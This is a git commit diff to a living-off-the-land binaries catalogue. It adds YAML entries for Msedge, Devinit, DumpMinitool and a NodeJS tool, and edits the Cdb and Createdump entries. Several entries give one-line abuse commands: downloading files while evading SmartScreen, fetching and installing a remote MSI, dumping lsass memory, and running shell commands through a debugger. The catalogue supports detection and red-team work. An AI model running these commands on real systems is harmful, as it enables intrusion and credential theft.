Several LOLBINs additions & modifications (#192)

Co-authored-by: Wietze <wietze@users.noreply.github.com>

yml/OSBinaries/Explorer.yml

@@ -1,7 +1,7 @@
 ---
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
-Author: 'Jai Minton'
+Author: Jai Minton
 Created: 2020-06-24
 Commands:
   - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\explorer.exe
   - Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml

yml/OSBinaries/Msedge.yml

@@ -0,0 +1,29 @@
+---
+Name: Msedge.exe
+Description: Microsoft Edge browser
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: msedge.exe https://example.com/file.exe.txt
+    Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+  - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+    Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
+  - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1478116126005641220
+  - Link: https://twitter.com/mrd0x/status/1478234484881436672
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/Adplus.yml

@@ -41,7 +41,7 @@ Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
   - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
-  - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
+  - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
   - Link: https://twitter.com/nas_bench/status/1534916659676422152
   - Link: https://twitter.com/nas_bench/status/1534915321856917506
 Acknowledgement:

yml/OtherMSBinaries/Cdb.yml

@@ -1,7 +1,7 @@
 ---
 Name: Cdb.exe
 Description: Debugging tool included with Windows Debugging Tools.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
     MitreID: T1127
     OperatingSystem: Windows
   - Command: |
-     cdb.exe -pd -pn <process_name>
-     .shell <cmd>
+      cdb.exe -pd -pn <process_name>
+      .shell <cmd>
     Description: Attaching to any process and executing shell commands.
     Usecase: Run a shell command under a trusted Microsoft signed binary
     Category: Execute
@@ -41,7 +41,7 @@ Resources:
   - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
   - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
   - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
-  - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
+  - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
   - Link: https://twitter.com/nas_bench/status/1534957360032120833
 Acknowledgement:
   - Person: Matt Graeber

yml/OtherMSBinaries/Createdump.yml

@@ -1,8 +1,8 @@
 ---
 Name: Createdump.exe
 Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
-Author: Daniel Santos
-Created: 2022-08-05
+Author: mr.d0x, Daniel Santos
+Created: 2022-01-20
 Commands:
   - Command: createdump.exe -n -f dump.dmp [PID]
     Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
@@ -13,6 +13,9 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+  - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml

yml/OtherMSBinaries/Devinit.yml

@@ -0,0 +1,21 @@
+---
+Name: Devinit.exe
+Description: Visual Studio 2019 tool
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: devinit.exe run -t msi-install -i https://example.com/out.msi
+    Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
+    Usecase: Executes code from a (remote) MSI file.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.007
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1460815932402679809
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/DumpMinitool.yml

@@ -0,0 +1,20 @@
+---
+Name: DumpMinitool.exe
+Description: Dump tool part Visual Studio 2022
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
+    Description: Creates a memory dump of the lsass process
+    Usecase: Create memory dump and parse it offline
+    Category: Dump
+    Privileges: Administrator
+    MitreID: T1003.001
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1511415432888131586
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'

yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml

@@ -0,0 +1,21 @@
+---
+Name: Microsoft.NodejsTools.PressAnyKey.exe
+Description: Part of the NodeJS Visual Studio tools.
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+  - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
+    Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
+    Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+Resources:
+  - Link: https://twitter.com/mrd0x/status/1463526834918854661
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'